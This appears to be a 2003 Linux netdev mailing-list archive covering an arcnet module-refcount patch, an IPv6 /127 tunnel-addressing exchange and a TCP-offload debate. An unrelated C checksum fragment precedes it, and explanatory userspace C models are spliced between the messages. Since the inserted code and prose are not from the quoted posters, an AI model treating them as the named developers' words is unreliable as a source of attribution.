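 * Bytes are paired into big-endian 16-bit words, summed with
 * end-around carry, and the result is complemented. A trailing
 * odd byte is treated as the high byte of a final word.
 */
static uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint64_t sum = 0;

    while (len > 1) {
        sum += ((uint32_t)data[0] << 8) | data[1];
        data += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)data[0] << 8;

    /* Fold the carries back into the low 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);

    return (uint16_t)~sum;
}
```

A receiver can verify data by running the same function over the payload followed by the transmitted checksum; an intact buffer yields zero.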
From hch@lst.de Sun Jul 13 07:38:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 07:38:15 -0700 (PDT) Received: from mail.lst.de (verein.lst.de [212.34.189.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DEc4Fl002787 for ; Sun, 13 Jul 2003 07:38:05 -0700 Received: from verein.lst.de (localhost [127.0.0.1]) by mail.lst.de (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6DCvnDC024415 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Sun, 13 Jul 2003 14:57:49 +0200 Received: (from hch@localhost) by verein.lst.de (8.12.3/8.12.3/Debian-6.3) id h6DCvmud024413 for netdev@oss.sgi.com; Sun, 13 Jul 2003 14:57:48 +0200 Date: Sun, 13 Jul 2003 14:57:48 +0200 From: Christoph Hellwig To: netdev@oss.sgi.com Subject: [PATCH] fix arcnet module refcounting Message-ID: <20030713125748.GA24403@lst.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-Spam-Score: -3 () PATCH_UNIFIED_DIFF,USER_AGENT_MUTT X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang) X-archive-position: 3992 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@lst.de Precedence: bulk X-list: netdev struct arcnet_local needs a struct module *owner; adding it also cleans up a lot of the code nicely.
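The pattern the patch moves to (take a reference on the owning module at open, drop it on every failure path and at close) can be modelled in user space as follows. This is a sketch under stated assumptions: model_module, model_try_get, model_put, model_hw, model_open and model_close are hypothetical names that only imitate the shape of try_module_get()/module_put(), and the reset_fails flag stands in for the ARCRESET failure case. The kernel's real reference counting is more involved.

```c
#include <errno.h>
#include <stdbool.h>

/* Hypothetical model of a module with a use count. */
struct model_module {
    int refcount;
    bool unloading;   /* once set, no new references may be taken */
};

static bool model_try_get(struct model_module *m)
{
    if (m->unloading)
        return false;
    m->refcount++;
    return true;
}

static void model_put(struct model_module *m)
{
    m->refcount--;
}

/* Hypothetical model of the per-card hardware ops with an owner field. */
struct model_hw {
    struct model_module *owner;
    bool reset_fails;   /* stands in for a failing card reset */
};

/* Open: pin the owner first, unwind the reference on any later error. */
static int model_open(struct model_hw *hw)
{
    int error;

    if (!model_try_get(hw->owner))
        return -ENODEV;

    error = -ENODEV;
    if (hw->reset_fails)
        goto out_module_put;

    return 0;

out_module_put:
    model_put(hw->owner);
    return error;
}

/* Close: release the reference taken by a successful open. */
static int model_close(struct model_hw *hw)
{
    model_put(hw->owner);
    return 0;
}
```

The point of the single owner field is that the generic open and close paths can do the counting once, so the individual card drivers no longer need their own open/close callbacks just to bump a use count.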
--- 1.6/drivers/net/arcnet/arc-rimi.c Sat Jun 28 08:20:41 2003 +++ edited/drivers/net/arcnet/arc-rimi.c Thu Jul 10 16:28:29 2003 @@ -47,7 +47,6 @@ static int arcrimi_status(struct net_device *dev); static void arcrimi_setmask(struct net_device *dev, int mask); static int arcrimi_reset(struct net_device *dev, int really_reset); -static void arcrimi_openclose(struct net_device *dev, bool open); static void arcrimi_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void arcrimi_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -179,7 +178,7 @@ lp->hw.status = arcrimi_status; lp->hw.intmask = arcrimi_setmask; lp->hw.reset = arcrimi_reset; - lp->hw.open_close = arcrimi_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = arcrimi_copy_to_card; lp->hw.copy_from_card = arcrimi_copy_from_card; lp->mem_start = ioremap(dev->mem_start, dev->mem_end - dev->mem_start + 1); @@ -252,15 +251,6 @@ /* done! return success. */ return 0; -} - - -static void arcrimi_openclose(struct net_device *dev, int open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; } static void arcrimi_setmask(struct net_device *dev, int mask) --- 1.14/drivers/net/arcnet/arcnet.c Sun Jun 15 01:16:09 2003 +++ edited/drivers/net/arcnet/arcnet.c Thu Jul 10 16:53:24 2003 @@ -343,7 +343,10 @@ static int arcnet_open(struct net_device *dev) { struct arcnet_local *lp = (struct arcnet_local *) dev->priv; - int count, newmtu; + int count, newmtu, error; + + if (!try_module_get(lp->hw.owner)) + return -ENODEV; BUGLVL(D_PROTO) { int count; @@ -360,8 +363,9 @@ /* try to put the card in a defined state - if it fails the first * time, actually reset it. 
*/ + error = -ENODEV; if (ARCRESET(0) && ARCRESET(1)) - return -ENODEV; + goto out_module_put; newmtu = choose_mtu(); if (newmtu < dev->mtu) @@ -391,7 +395,7 @@ lp->rfc1201.sequence = 1; /* bring up the hardware driver */ - ARCOPEN(1); + lp->hw.open(dev); if (dev->dev_addr[0] == 0) BUGMSG(D_NORMAL, "WARNING! Station address 00 is reserved " @@ -415,6 +419,10 @@ netif_start_queue(dev); return 0; + + out_module_put: + module_put(lp->hw.owner); + return error; } @@ -432,8 +440,8 @@ mdelay(1); /* shut down the card */ - ARCOPEN(0); - + lp->hw.close(dev); + module_put(lp->hw.owner); return 0; } --- 1.5/drivers/net/arcnet/com20020-isa.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com20020-isa.c Thu Jul 10 16:30:53 2003 @@ -131,14 +131,6 @@ MODULE_PARM(clockm, "i"); MODULE_LICENSE("GPL"); -static void com20020isa_open_close(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - int init_module(void) { struct net_device *dev; @@ -160,7 +152,7 @@ lp->clockp = clockp & 7; lp->clockm = clockm & 3; lp->timeout = timeout & 3; - lp->hw.open_close_ll = com20020isa_open_close; + lp->owner = THIS_MODULE; dev->base_addr = io; dev->irq = irq; --- 1.13/drivers/net/arcnet/com20020-pci.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com20020-pci.c Thu Jul 10 16:54:28 2003 @@ -60,14 +60,6 @@ MODULE_PARM(clockm, "i"); MODULE_LICENSE("GPL"); -static void com20020pci_open_close(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - static int __devinit com20020pci_probe(struct pci_dev *pdev, const struct pci_device_id *id) { struct net_device *dev; @@ -111,7 +103,7 @@ lp->clockp = clockp & 7; lp->clockm = clockm & 3; lp->timeout = timeout; - lp->hw.open_close_ll = com20020pci_open_close; + lp->hw.owner = THIS_MODULE; if (check_region(ioaddr, ARCNET_TOTAL_SIZE)) { BUGMSG(D_INIT, "IO region %xh-%xh already allocated.\n", --- 1.5/drivers/net/arcnet/com20020.c Sat Feb 15 
00:22:10 2003 +++ edited/drivers/net/arcnet/com20020.c Thu Jul 10 16:33:36 2003 @@ -50,13 +50,12 @@ static int com20020_status(struct net_device *dev); static void com20020_setmask(struct net_device *dev, int mask); static int com20020_reset(struct net_device *dev, int really_reset); -static void com20020_openclose(struct net_device *dev, bool open); static void com20020_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com20020_copy_from_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com20020_set_mc_list(struct net_device *dev); - +static void com20020_close(struct net_device *, bool); static void com20020_copy_from_card(struct net_device *dev, int bufnum, int offset, void *buf, int count) @@ -162,13 +161,14 @@ lp = (struct arcnet_local *) dev->priv; + lp->hw.owner = THIS_MODULE; lp->hw.command = com20020_command; lp->hw.status = com20020_status; lp->hw.intmask = com20020_setmask; lp->hw.reset = com20020_reset; - lp->hw.open_close = com20020_openclose; lp->hw.copy_to_card = com20020_copy_to_card; lp->hw.copy_from_card = com20020_copy_from_card; + lp->hw.close = com20020_close; dev->set_multicast_list = com20020_set_mc_list; @@ -298,24 +298,17 @@ return ASTATUS(); } - -static void com20020_openclose(struct net_device *dev, bool open) +static void com20020_close(struct net_device *dev, bool open) { struct arcnet_local *lp = (struct arcnet_local *) dev->priv; int ioaddr = dev->base_addr; - if (open) { - MOD_INC_USE_COUNT; - } - else { + if (!open) { /* disable transmitter */ lp->config &= ~TXENcfg; SETCONF; - MOD_DEC_USE_COUNT; } - lp->hw.open_close_ll(dev, open); } - /* Set or clear the multicast filter for this adaptor. 
* num_addrs == -1 Promiscuous mode, receive all packets --- 1.7/drivers/net/arcnet/com90io.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com90io.c Thu Jul 10 16:28:29 2003 @@ -47,7 +47,6 @@ static int com90io_status(struct net_device *dev); static void com90io_setmask(struct net_device *dev, int mask); static int com90io_reset(struct net_device *dev, int really_reset); -static void com90io_openclose(struct net_device *dev, bool open); static void com90io_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com90io_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -257,7 +256,7 @@ lp->hw.status = com90io_status; lp->hw.intmask = com90io_setmask; lp->hw.reset = com90io_reset; - lp->hw.open_close = com90io_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = com90io_copy_to_card; lp->hw.copy_from_card = com90io_copy_from_card; @@ -342,14 +341,6 @@ short ioaddr = dev->base_addr; AINTMASK(mask); -} - -static void com90io_openclose(struct net_device *dev, int open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; } static void com90io_copy_to_card(struct net_device *dev, int bufnum, int offset, --- 1.7/drivers/net/arcnet/com90xx.c Thu May 22 10:08:06 2003 +++ edited/drivers/net/arcnet/com90xx.c Thu Jul 10 16:28:29 2003 @@ -58,7 +58,6 @@ static int com90xx_status(struct net_device *dev); static void com90xx_setmask(struct net_device *dev, int mask); static int com90xx_reset(struct net_device *dev, int really_reset); -static void com90xx_openclose(struct net_device *dev, bool open); static void com90xx_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count); static void com90xx_copy_from_card(struct net_device *dev, int bufnum, int offset, @@ -450,7 +449,7 @@ lp->hw.status = com90xx_status; lp->hw.intmask = com90xx_setmask; lp->hw.reset = com90xx_reset; - lp->hw.open_close = com90xx_openclose; + lp->hw.owner = THIS_MODULE; lp->hw.copy_to_card = 
com90xx_copy_to_card; lp->hw.copy_from_card = com90xx_copy_from_card; lp->mem_start = ioremap(dev->mem_start, dev->mem_end - dev->mem_start + 1); @@ -569,16 +568,6 @@ /* done! return success. */ return 0; } - - -static void com90xx_openclose(struct net_device *dev, bool open) -{ - if (open) - MOD_INC_USE_COUNT; - else - MOD_DEC_USE_COUNT; -} - static void com90xx_copy_to_card(struct net_device *dev, int bufnum, int offset, void *buf, int count) --- 1.4/include/linux/arcdevice.h Sun Jun 15 01:16:09 2003 +++ edited/include/linux/arcdevice.h Thu Jul 10 16:48:24 2003 @@ -291,12 +291,13 @@ /* hardware-specific functions */ struct { + struct module *owner; void (*command) (struct net_device * dev, int cmd); int (*status) (struct net_device * dev); void (*intmask) (struct net_device * dev, int mask); bool (*reset) (struct net_device * dev, bool really_reset); - void (*open_close) (struct net_device * dev, bool open); - void (*open_close_ll) (struct net_device * dev, bool open); + void (*open) (struct net_device * dev); + void (*close) (struct net_device * dev); void (*copy_to_card) (struct net_device * dev, int bufnum, int offset, void *buf, int count); @@ -312,7 +313,6 @@ #define ACOMMAND(x) (lp->hw.command(dev, (x))) #define ASTATUS() (lp->hw.status(dev)) #define AINTMASK(x) (lp->hw.intmask(dev, (x))) -#define ARCOPEN(x) (lp->hw.open_close(dev, (x))) From linux-netdev@gmane.org Sun Jul 13 07:51:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 07:51:21 -0700 (PDT) Received: from main.gmane.org (main.gmane.org [80.91.224.249]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DEpEFl003158 for ; Sun, 13 Jul 2003 07:51:15 -0700 Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19biB9-0006BM-00 for ; Sun, 13 Jul 2003 16:50:19 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: netdev@oss.sgi.com Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bi9I-000649-00 for ; Sun, 13 Jul 2003 16:48:24 +0200 From: 
Anand Kumria Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Date: Mon, 14 Jul 2003 00:49:17 +1000 Lines: 38 Message-ID: References: <20030711.005542.04973601.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Complaints-To: usenet@main.gmane.org User-Agent: Pan/0.11.2 (Unix) X-Comment-To: "Pekka Savola" X-archive-position: 3993 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: wildfire@progsoc.org Precedence: bulk X-list: netdev On Fri, 11 Jul 2003 02:08:20 +1000, Pekka Savola wrote: > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B > wrote: >> In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 >> 01:43:03 +1000), CaT says: >> >> > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection >> > and as such get ipv6 connectivity. I think went to 2.4.21 and then to >> > 2.4.22-pre4 and bringing up the tunnel fails as follows: >> : >> > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 >> > ip route add ::/0 via 3ffe:8001:000c:ffff::36 >> > RTNETLINK answers: Invalid argument >> >> This is not bug, but rather misconfiguration; you cannot use prefix::, >> which is mandatory subnet routers anycast address, as unicast address. I'm the other end of this link, so I'm wondering how this is a misconfiguration. RFC3513 2.6.1 suggests to me that 3ffe:8001:c:ffff::36/127 is the router address (my end) and the other side should be 3ffe:8001:c:ffff::37/127. > While technically correct, I'm still not sure if this is (pragmatically) > the correct approach. It's OK to set a default route to go to the > subnet routers anycast address (so, setting a route to prefix:: should > not give you EINVAL). > Both Yoshifuji and yourself suggested that /127 isn't the way to go and that this is something v6ops ought to take up. I had a quick look at the v6ops IETF group and nothing struck me. 
What would you recommend I look at to see why /127 is a bad idea or /64 is a better idea than /127? Thanks, Anand From pekkas@netcore.fi Sun Jul 13 09:23:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:23:23 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGNGFl004187 for ; Sun, 13 Jul 2003 09:23:17 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6DGN5823685; Sun, 13 Jul 2003 19:23:05 +0300 Date: Sun, 13 Jul 2003 19:23:05 +0300 (EEST) From: Pekka Savola To: Anand Kumria cc: netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3995 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev See http://www.ietf.org/internet-drafts/draft-savola-ipv6-127-prefixlen-04.txt it should answer your questions. On Mon, 14 Jul 2003, Anand Kumria wrote: > On Fri, 11 Jul 2003 02:08:20 +1000, Pekka Savola wrote: > > > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B > > wrote: > >> In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 > >> 01:43:03 +1000), CaT says: > >> > >> > With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection > >> > and as such get ipv6 connectivity. I think went to 2.4.21 and then to > >> > 2.4.22-pre4 and bringing up the tunnel fails as follows: > >> : > >> > ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 > >> > ip route add ::/0 via 3ffe:8001:000c:ffff::36 > >> > RTNETLINK answers: Invalid argument > >> > >> This is not bug, but rather misconfiguration; you cannot use prefix::, > >> which is mandatory subnet routers anycast address, as unicast address. 
> > I'm the other end of this link, so I'm wondering how this is a > misconfiguration. RFC3513 2.6.1 suggests to me that > 3ffe:8001:c:ffff::36/127 is the router address (my end) and the other > side should be 3ffe:8001:c:ffff::37/127. > > > While technically correct, I'm still not sure if this is (pragmatically) > > the correct approach. It's OK to set a default route to go to the > > subnet routers anycast address (so, setting a route to prefix:: should > > not give you EINVAL). > > > > Both Yoshifuji and yourself suggested that /127 isn't the way to go and > that this is something v6ops ought to take up. I had a quick look at the > v6ops IETF group and nothing struck me. > > What would you recommend I look at to see why /127 is a bad idea or /64 > is a better idea than /127? > > Thanks, > Anand > > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From roland@topspin.com Sun Jul 13 09:22:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:22:45 -0700 (PDT) Received: from umhlanga.STRATNET.NET (mail.netapps.org [12.162.17.40]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGMbFl004123 for ; Sun, 13 Jul 2003 09:22:38 -0700 Received: from exch-1.topspincom.com ([12.162.17.3]) by umhlanga.STRATNET.NET with Microsoft SMTPSVC(5.0.2195.5329); Sun, 13 Jul 2003 09:22:35 -0700 Received: from gold ([10.10.253.60] unverified) by exch-1.topspincom.com with Microsoft SMTPSVC(5.0.2195.5329); Sun, 13 Jul 2003 09:22:34 -0700 Received: from roland by gold with local (Exim 3.35 #1 (Debian)) id 19bjcO-0001mp-00; Sun, 13 Jul 2003 09:22:32 -0700 To: "David S. 
Miller" Cc: "Alan Shih" , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> X-Message-Flag: Warning: May contain useful information X-Priority: 1 X-MSMail-Priority: High From: Roland Dreier Date: 13 Jul 2003 09:22:32 -0700 In-Reply-To: <20030713004818.4f1895be.davem@redhat.com> Message-ID: <52u19qwg53.fsf@topspin.com> Lines: 43 User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Common Lisp) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-OriginalArrivalTime: 13 Jul 2003 16:22:34.0890 (UTC) FILETIME=[F7BF4EA0:01C3495A] X-archive-position: 3994 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: roland@topspin.com Precedence: bulk X-list: netdev David> TOE is evil, read this: David> http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf David> TOE is exactly suboptimal for the very things performance David> matters, high connection rates. David> Your return is also absolutely questionable. Servers David> "serve" data and we offload all of the send side TCP David> processing that can reasonably be done (segmentation, David> checksumming). David> I've never seen an impartial benchmark showing that TCP David> send side performance goes up as a result of using TOE David> vs. the usual segmentation + checksum offloading offered David> today. David> On receive side, clever RX buffer flipping tricks are the David> way to go and require no protocol changes and nothing gross David> like TOE or weird buffer ownership protocols like RDMA David> requires. David> I've made postings showing how such a scheme can work using David> a limited flow cache on the networking card. I don't have David> a reference handy, but I suppose someone else does. Your ideas are certainly very interesting, and I would be happy to see hardware that supports flow identification. 
But the Usenix paper you're citing completely disagrees with you! For example, Mogul writes: "Nevertheless, copy-avoidance designs have not been widely adopted, due to significant limitations. For example, when network maximum segment size (MSS) values are smaller than VM page sizes, which is often the case, page-remapping techniques are insufficient (and page-remapping often imposes overheads of its own.)" In fact, his conclusion is: "However, as hardware trends change the feasibility and economics of network-based storage connections, RDMA will become a significant and appropriate justification for TOEs." - Roland From alan@lxorguk.ukuu.org.uk Sun Jul 13 09:34:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:34:19 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGYEFl005312 for ; Sun, 13 Jul 2003 09:34:15 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6DGVcKd000604; Sun, 13 Jul 2003 17:31:38 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6DGVZn3000602; Sun, 13 Jul 2003 17:31:35 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: TCP IP Offloading Interface From: Alan Cox To: Roland Dreier Cc: "David S. 
Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <52u19qwg53.fsf@topspin.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 13 Jul 2003 17:31:35 +0100 X-archive-position: 3996 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev

On Sun, 2003-07-13 at 17:22, Roland Dreier wrote:
> Your ideas are certainly very interesting, and I would be happy to see
> hardware that supports flow identification. But the Usenix paper
> you're citing completely disagrees with you! For example, Mogul writes:

Take a look at who holds the official Internet land speed record. It's not a TOE-using system.

> "Nevertheless, copy-avoidance designs have not been widely adopted,
> due to significant limitations. For example, when network maximum
> segment size (MSS) values are smaller than VM page sizes, which is
> often the case, page-remapping techniques are insufficient (and
> page-remapping often imposes overheads of its own.)"

Page remapping is adequate for sending data when the MSS is below the VM page size, since you don't have to send all of the page you pinned or set COW/SOW (sleep on write).

For receive, if your hardware can demux on the TCP headers and the expected sequence, then page remapping isn't needed either.

Finally, if you are streaming objects by non-mapped references (e.g. sendfile, or see LM's paper from long ago on splice()), then the problem goes away.
> In fact, his conclusion is: > > "However, as hardware trends change the feasibility and economics of > network-based storage connections, RDMA will become a significant > and appropriate justification for TOEs." > > - Roland > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ From jgarzik@pobox.com Sun Jul 13 09:50:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 09:50:19 -0700 (PDT) Received: from www.linux.org.uk (IDENT:yJAaINogrkOb0+tSqMHBJ9/bzzCG3CKg@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DGoCFl006235 for ; Sun, 13 Jul 2003 09:50:13 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19bk39-000466-IV; Sun, 13 Jul 2003 17:50:11 +0100 Message-ID: <3F118DB7.5060009@pobox.com> Date: Sun, 13 Jul 2003 12:49:59 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Alan Cox CC: Roland Dreier , "David S. 
Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> In-Reply-To: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3997 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Alan Cox wrote: > Finally if you are streaming objects by non mapped references (eg > sendfile or see LM's paper from long ago on splice()) then the problem > goes away. I had forgotten all about splice. For interested readers, here is the link: http://www.bitmover.com/lm/papers/splice.ps Jeff From davem@redhat.com Sun Jul 13 16:11:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:11:13 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNB3Fl010851 for ; Sun, 13 Jul 2003 16:11:04 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09626; Sun, 13 Jul 2003 16:02:00 -0700 Date: Sun, 13 Jul 2003 16:02:00 -0700 From: "David S. 
Miller" To: Roland Dreier Cc: alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713160200.571716cf.davem@redhat.com> In-Reply-To: <52u19qwg53.fsf@topspin.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3998 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev

On 13 Jul 2003 09:22:32 -0700 Roland Dreier wrote:
> David> TOE is evil, read this:
>
> David> http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf

> Your ideas are certainly very interesting, and I would be happy to see
> hardware that supports flow identification. But the Usenix paper
> you're citing completely disagrees with you!

I didn't say I agree with all of Mogul's ideas, just his anti-TOE arguments. For example, I also think RDMA sucks too yet he thinks it's a good idea.

> For example, Mogul writes:
>
> "Nevertheless, copy-avoidance designs have not been widely adopted,
> due to significant limitations. For example, when network maximum
> segment size (MSS) values are smaller than VM page sizes, which is
> often the case, page-remapping techniques are insufficient (and
> page-remapping often imposes overheads of its own.)"

On send this doesn't matter. On receive you use my clever receive buffer handling + flow cache idea to accumulate the data portion of packets into page-sized chunks for the networking to flip.

You obviously don't understand my ideas if you think that it matters whether there is some relationship between the MTU and the system page size necessary for the scheme to work.
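
The accumulation step described above can be modelled in a few lines of userspace C. This is only a toy sketch under stated assumptions: the names flow_accum and accum_payload() are hypothetical, the page size is assumed to be 4096 bytes, and memcpy() stands in for the card placing payload bytes by DMA. It is not the scheme from the earlier postings, just an illustration that segment size and page size need not be related.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAGE_BYTES 4096u        /* assumed page size for this sketch */

/* Hypothetical per-flow state: one partially filled page. */
struct flow_accum {
    uint8_t page[PAGE_BYTES];
    size_t used;                /* payload bytes in the current page */
    unsigned long flipped;      /* complete pages handed up so far */
};

/*
 * Append the payload of one segment to the flow's current page.
 * Returns how many pages were completed by this call. A payload may
 * straddle a page boundary, so any segment size works.
 */
unsigned accum_payload(struct flow_accum *fa, const uint8_t *payload,
                       size_t len)
{
    unsigned done = 0;

    assert(fa != NULL && (payload != NULL || len == 0));
    while (len > 0) {
        size_t room = PAGE_BYTES - fa->used;
        size_t n = len < room ? len : room;

        /* Stand-in for the hardware placing data directly in the page. */
        memcpy(fa->page + fa->used, payload, n);
        fa->used += n;
        payload += n;
        len -= n;

        if (fa->used == PAGE_BYTES) {
            /* A full page: this is where it would be flipped upward. */
            fa->flipped++;
            fa->used = 0;
            done++;
        }
    }
    return done;
}
```

Feeding three 1460-byte payloads into an empty flow_accum completes one page on the third call and leaves 284 bytes pending in the next one.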
